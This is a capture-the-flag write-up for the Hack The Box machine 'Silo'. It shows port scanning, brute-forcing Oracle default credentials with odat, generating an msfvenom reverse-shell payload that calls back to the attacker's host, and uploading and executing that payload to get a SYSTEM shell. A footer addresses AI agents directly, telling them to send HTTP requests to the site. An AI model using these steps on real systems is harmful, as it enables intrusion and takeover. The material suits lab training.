# Silo ![](https://1074697697-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FyIspp1QgGM7SFqLfTs4l%2Fuploads%2F9rl53uTQQ2kgrYTQVIel%2Fsilo.png?alt=media\&token=f567fa27-bec7-45d1-9457-ca3bc7bb6df1) ## Enumeration As usual, we start with an nmap scan, in order to find open ports in the target machine. The following nmap command will scan the target machine looking for open ports in a fast way and saving the output into a file: > nmap -sS --min-rate 5000 -p- -T5 -Pn -n 10.10.10.82 -oN allPorts * `-sS` use the **TCP SYN** scan option. This scan option is relatively unobtrusive and stealthy, since it never completes TCP connections. * `--min-rate 5000` nmap will try to keep the sending rate **at or above** 5000 packets per second. * `-p-` scanning the entire port range, **from 1 to 65535**. * `-T5` **insane** mode, it is the fastest mode of the nmap time template. * `-Pn` assume the host is **online**. * `-n` scan without reverse **DNS** resolution. * `-oN` **save** the scan result into a file, in this case the *allports* file. ``` # Nmap 7.92 scan initiated Wed Mar 9 10:01:38 2022 as: nmap -sS -p- -T5 --min-rate 5000 -n -Pn -oN allPorts 10.10.10.82 Warning: 10.10.10.82 giving up on port because retransmission cap hit (2). Nmap scan report for 10.10.10.82 Host is up (0.050s latency). Not shown: 65519 closed tcp ports (reset) PORT STATE SERVICE 80/tcp open http 135/tcp open msrpc 139/tcp open netbios-ssn 445/tcp open microsoft-ds 1521/tcp open oracle 5985/tcp open wsman 8080/tcp open http-proxy 47001/tcp open winrm 49152/tcp open unknown 49153/tcp open unknown 49154/tcp open unknown 49155/tcp open unknown 49159/tcp open unknown 49160/tcp open unknown 49161/tcp open unknown 49162/tcp open unknown # Nmap done at Wed Mar 9 10:01:55 2022 -- 1 IP address (1 host up) scanned in 17.85 seconds ``` As we see, there are a lot of ports open. Let's try to obtain more information about the services and versions running on those ports. > nmap -sC -sV -p80,135,139,445,1521,5985,8080,47001,49152,49153,49154,49155,49159,49160,49161,49162 10.10.10.82 -oN targeted * `-sC` performs the scan using the default set of **scripts**. * `-sV` enables **version** detection. * `-oN` **save** the scan result into file, in this case the *targeted* file. ``` # Nmap 7.92 scan initiated Wed Mar 9 10:04:10 2022 as: nmap -sCV -p80,135,139,445,1521,5985,8080,47001,49152,49153,49154,49155,49159,49160,49161,49162 -oN targeted 10.10.10.82 Nmap scan report for 10.10.10.82 Host is up (0.048s latency). PORT STATE SERVICE VERSION 80/tcp open http Microsoft IIS httpd 8.5 | http-methods: |_ Potentially risky methods: TRACE |_http-server-header: Microsoft-IIS/8.5 |_http-title: IIS Windows Server 135/tcp open msrpc Microsoft Windows RPC 139/tcp open netbios-ssn Microsoft Windows netbios-ssn 445/tcp open microsoft-ds Microsoft Windows Server 2008 R2 - 2012 microsoft-ds 1521/tcp open oracle-tns Oracle TNS listener 11.2.0.2.0 (unauthorized) 5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP) |_http-server-header: Microsoft-HTTPAPI/2.0 |_http-title: Not Found 8080/tcp open http Oracle XML DB Enterprise Edition httpd |_http-server-header: Oracle XML DB/Oracle Database |_http-title: 400 Bad Request | http-auth: | HTTP/1.1 401 Unauthorized\x0D |_ Basic realm=XDB 47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP) |_http-server-header: Microsoft-HTTPAPI/2.0 |_http-title: Not Found 49152/tcp open msrpc Microsoft Windows RPC 49153/tcp open msrpc Microsoft Windows RPC 49154/tcp open msrpc Microsoft Windows RPC 49155/tcp open msrpc Microsoft Windows RPC 49159/tcp open oracle-tns Oracle TNS listener (requires service name) 49160/tcp open msrpc Microsoft Windows RPC 49161/tcp open msrpc Microsoft Windows RPC 49162/tcp open msrpc Microsoft Windows RPC Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows Host script results: |_clock-skew: mean: 1s, deviation: 0s, median: 0s | smb-security-mode: | authentication_level: user | challenge_response: supported |_ message_signing: supported | smb2-security-mode: | 3.0.2: |_ Message signing enabled but not required | smb2-time: | date: 2022-03-09T09:06:20 |_ start_date: 2022-03-09T07:34:37 Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . # Nmap done at Wed Mar 9 10:06:22 2022 -- 1 IP address (1 host up) scanned in 132.05 seconds ``` If we enumerate the SMB service with crackmapexec, we'll see the machine is a `Windows Server 2012 R2 Standard 9600 x64`. > crackmapexec smb 10.10.10.82 ``` SMB 10.10.10.82 445 SILO [*] Windows Server 2012 R2 Standard 9600 x64 (name:SILO) (domain:SILO) (signing:False) (SMBv1:True) ``` ## Exploitation In port *1521* there is an *Oracle TNS listener*. We can enumerate *Oracle* with the *odat* tool. It is a bit tedious to install it, but let's do it. First, let's clone it's [*Github* repository](https://github.com/quentinhardy/odat). > git clone Then we'll go to the `odat/` directory and execute the following commands. > cd odat/ > > git submodule init > > git submodule update Now, we'll have to install some libraries. > sudo apt-get install libaio1 python3-dev alien python3-pip As we saw with *crackmapexec*, the machine has a `x64` bit architecture. So we'll go to [this](https://www.oracle.com/database/technologies/instant-client/linux-x86-64-downloads.html) website and download the following files. ![](https://1074697697-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FyIspp1QgGM7SFqLfTs4l%2Fuploads%2FiMIAnhFg9A0tLUaOKj8p%2FCaptura%20de%20pantalla%202022-03-09%20120551.png?alt=media\&token=1b76c210-ec95-41eb-ba4e-a2366af0666e) ![](https://1074697697-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FyIspp1QgGM7SFqLfTs4l%2Fuploads%2Fk6rfkUfWxjsy1OtfB7Qa%2FCaptura%20de%20pantalla%202022-03-09%20120612.png?alt=media\&token=de43ac98-297a-4069-85f7-6984a48d478c) ![](https://1074697697-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FyIspp1QgGM7SFqLfTs4l%2Fuploads%2FVCS58S2LJ1W1BC9W2lOe%2FCaptura%20de%20pantalla%202022-03-09%20120630.png?alt=media\&token=c99596ff-c220-49b1-926a-b3eadf7b0502) Now that we have all these `.rpm` files, we will have to use *alien* to convert them to `.deb` file. > alien --to-deb \*.rpm Once we have the `.deb` files, we'll install them with *dpkg*. > dpkg -i \*.deb Next, let's install a python module. > pip3 install cx\_Oracle Then, we'll export some environment variables. > export ORACLE\_HOME=/usr/lib/oracle/21/client64/ > > export LD\_LIBRARY\_PATH=$LD\_LIBRARY\_PATH:$ORACLE\_HOME/lib > > export PATH=${ORACLE\_HOME}bin:$PATH Then, install some more libraries and modules. > apt-get install python3-scapy > > pip3 install colorlog termcolor pycrypto passlib python-libnmap > > pip3 install argcomplete && sudo activate-global-python-argcomplete And finally, we could run the *odat* tool. {% hint style="warning" %} If an error appears saying that a module is missing, you can always search for it on the internet. {% endhint %} > python3 odat.py --help ``` usage: odat.py [-h] [--version] {all,tnscmd,tnspoison,sidguesser,snguesser,passwordguesser,utlhttp,httpuritype,utltcp,ctxsys,externaltable,dbmsxslprocessor,dbmsadvisor,utlfile,dbmsscheduler,java,passwordstealer,oradbg,dbmslob,stealremotepwds,userlikepwd,smb,privesc,cve,search,unwrapper,clean} ... _ __ _ ___ / \| \ / \|_ _| ( o ) o ) o || | \_/|__/|_n_||_| ------------------------------------------- _ __ _ ___ / \ | \ / \ |_ _| ( o ) o ) o | | | \_/racle |__/atabase |_n_|ttacking |_|ool ------------------------------------------- By Quentin Hardy (quentin.hardy@protonmail.com or quentin.hardy@bt.com) positional arguments: {all,tnscmd,tnspoison,sidguesser,snguesser,passwordguesser,utlhttp,httpuritype,utltcp,ctxsys,externaltable,dbmsxslprocessor,dbmsadvisor,utlfile,dbmsscheduler,java,passwordstealer,oradbg,dbmslob,stealremotepwds,userlikepwd,smb,privesc,cve,search,unwrapper,clean} Choose a main command all to run all modules in order to know what it is possible to do tnscmd to communicate with the TNS listener tnspoison to exploit TNS poisoning attack (SID required) sidguesser to know valid SIDs snguesser to know valid Service Name(s) passwordguesser to know valid credentials utlhttp to send HTTP requests or to scan ports httpuritype to send HTTP requests or to scan ports utltcp to scan ports ctxsys to read files externaltable to read files or to execute system commands/scripts dbmsxslprocessor to upload files dbmsadvisor to upload files utlfile to download/upload/delete files dbmsscheduler to execute system commands without a standard output java to execute system commands passwordstealer to get hashed Oracle passwords oradbg to execute a bin or script dbmslob to download files stealremotepwds to steal hashed passwords thanks an authentication sniffing (CVE-2012-3137) userlikepwd to try each Oracle username stored in the DB like the corresponding pwd smb to capture the SMB authentication privesc to gain elevated access cve to exploit a CVE search to search in databases, tables and columns unwrapper to unwrap PL/SQL source code (no for 9i version) clean clean traces and logs optional arguments: -h, --help show this help message and exit --version show program's version number and exit ``` To perform any attack with *odat*, we'll need a *SID*. So we could use the `sidguesser` option to discover valid *SIDs*. > python3 odat.py sidguesser -s 10.10.10.82 * `-s` **server**. ``` [1] (10.10.10.82:1521): Searching valid SIDs [1.1] Searching valid SIDs thanks to a well known SID list on the 10.10.10.82:1521 server [+] 'XE' is a valid SID. Continue... ##################################################################################################################################################################### | ETA: 00:00:00 ``` It found `XE` as a valid *SID*. Now we could try to brute force credentials with the `passwordguesser` option. I will be using the `/usr/share/metasploit-framework/data/wordlists/oracle_default_userpass.txt` *metasploit* dictionary. But, if you look at the dictionary, you'll see that it has the `user password` format. But odat only accept the `user/password` format. So let's change the dictionary format. > cat /usr/share/metasploit-framework/data/wordlists/oracle\_default\_userpass.txt | tr ' ' '/' > dictionary Now we could brute force credentials with *odat*. > python3 odat.py passwordguesser -s 10.10.10.82 -d XE --accounts-file dictionary * `-s` **server**. * `-d` oracle System ID (**SID**). * `--accounts-file` **file** containing Oracle credentials. ``` [1] (10.10.10.82:1521): Searching valid accounts on the 10.10.10.82 server, port 1521 12:36:22 WARNING -: The line 'jl/jl/\n' is not loaded in credentials list: ['jl', 'jl', ''] 12:36:22 WARNING -: The line 'ose$http$admin/invalid/password\n' is not loaded in credentials list: ['ose$http$admin', 'invalid', 'password'] The login brio_admin has already been tested at least once. What do you want to do: | ETA: --:--:-- - stop (s/S) - continue and ask every time (a/A) - skip and continue to ask (p/P) - continue without to ask (c/C) c [!] Notice: 'ctxsys' account is locked, so skipping this username for password | ETA: 00:06:14 [!] Notice: 'hr' account is locked, so skipping this username for password | ETA: 00:05:25 [!] Notice: 'mdsys' account is locked, so skipping this username for password | ETA: 00:03:44 [!] Notice: 'dbsnmp' account is locked, so skipping this username for password | ETA: 00:02:55 [!] Notice: 'dip' account is locked, so skipping this username for password######## | ETA: 00:02:49 [!] Notice: 'system' account is locked, so skipping this username for password############################################### | ETA: 00:01:52 [!] Notice: 'xdb' account is locked, so skipping this username for password####################################################################################### | ETA: 00:01:04 [!] Notice: 'outln' account is locked, so skipping this username for password################################################################################################## | ETA: 00:00:49 [+] Valid credentials found: scott/tiger. Continue... ############################################################################################################################################################# | ETA: 00:00:09 100% |######################################################################################################################################################################################################################| Time: 00:03:58 [+] Accounts found on 10.10.10.82:1521/sid:XE: scott/tiger ``` It found the user `scott` and the password `tiger`. Now that we have some valid credentials, we could upload files with the `utlfile` option. Let's create a malicious binary with *msfvenom* which will send us a reverse shell. > msfvenom -p windows/x64/shell\_reverse\_tcp lhost=10.10.14.5 lport=4444 -f exe -o shell.exe * `-p` indicates the type of **payload**. * `lhost` local **host** IP. * `lport` local **port** of the listener. * `-f` output **format**. * `-o` save the output to a **file**. ``` [-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload [-] No arch selected, selecting arch: x64 from the payload No encoder specified, outputting raw payload Payload size: 460 bytes Final size of exe file: 7168 bytes Saved as: shell.exe ``` Now, let's upload it to the machine with *odat* in the `/Temp` directory. > python3 odat.py utlfile -s 10.10.10.82 -d XE -U scott -P tiger --putFile /Temp shell.exe shell.exe * `-s` **server**. * `-d` oracle System ID (**SID**). * `-U` oracle **username**. * `-P` oracle **password**. * `--putFile` **put a file** to the remote database server. ``` [1] (10.10.10.82:1521): Put the /home/alfa8sa/HTB/machines/silo/shell.exe local file in the /Temp folder like shell.exe on the 10.10.10.82 server [-] Impossible to put the /home/alfa8sa/HTB/machines/silo/shell.exe file: `ORA-01031: insufficient privileges` ``` We get an error saying that we have insufficient privileges. Don't worry, we can user the `--sysdba` option to connect as the `DBA system` user. > python3 odat.py utlfile -s 10.10.10.82 -d XE -U scott -P tiger --putFile /Temp shell.exe shell.exe --sysdba * `-s` **server**. * `-d` oracle System ID (**SID**). * `-U` oracle **username**. * `-P` oracle **password**. * `--putFile` **put a file** to the remote database server. * `--sysdba` connection as **SYSDBA**. ``` [1] (10.10.10.82:1521): Put the /home/alfa8sa/HTB/machines/silo/shell.exe local file in the /Temp folder like shell.exe on the 10.10.10.82 server [+] The /home/alfa8sa/HTB/machines/silo/shell.exe file was created on the /Temp directory on the 10.10.10.82 server like the shell.exe file ``` Now that the binary is uploaded, we want to execute it. We can do it with the `externaltable` option. But first, let's set a *netcat* listener on port *4444*. > nc -lvnp 4444 * `-l` **listen** mode. * `-v` **verbose** mode. * `-n` **numeric-only** IP, no DNS resolution. * `-p` specify the **port** to listen on. The following command will execute the `shell.exe` binary, and we will catch the reverse shell on the *netcat* listener. > python3 odat.py externaltable -s 10.10.10.82 -d XE -U scott -P tiger --exec /Temp shell.exe --sysdba * `-s` **server**. * `-d` oracle System ID (**SID**). * `-U` oracle **username**. * `-P` oracle **password**. * `--exec` **execute** a system command on the remote system. * `--sysdba` connection as **SYSDBA**. ``` [1] (10.10.10.82:1521): Execute the shell.exe command stored in the /Temp path ``` As we get the shell as the `nt authority\system` user, all we have to do is reap the harvest and take both the user flag, and the root flag. ``` listening on [any] 4444 ... connect to [10.10.14.5] from (UNKNOWN) [10.10.10.82] 49184 Microsoft Windows [Version 6.3.9600] (c) 2013 Microsoft Corporation. All rights reserved. C:\oraclexe\app\oracle\product\11.2.0\server\DATABASE>whoami whoami nt authority\system C:\oraclexe\app\oracle\product\11.2.0\server\DATABASE>type \users\phineas\desktop\user.txt type \users\phineas\desktop\user.txt ad6364c9113c9f1e283264078a94925c C:\oraclexe\app\oracle\product\11.2.0\server\DATABASE>type \users\administrator\desktop\root.txt type \users\administrator\desktop\root.txt 8800ec7febdb70445e705e31dc7c0c33 ``` --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://alfa8sa.gitbook.io/htb-writeups/windows-machines/silo.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.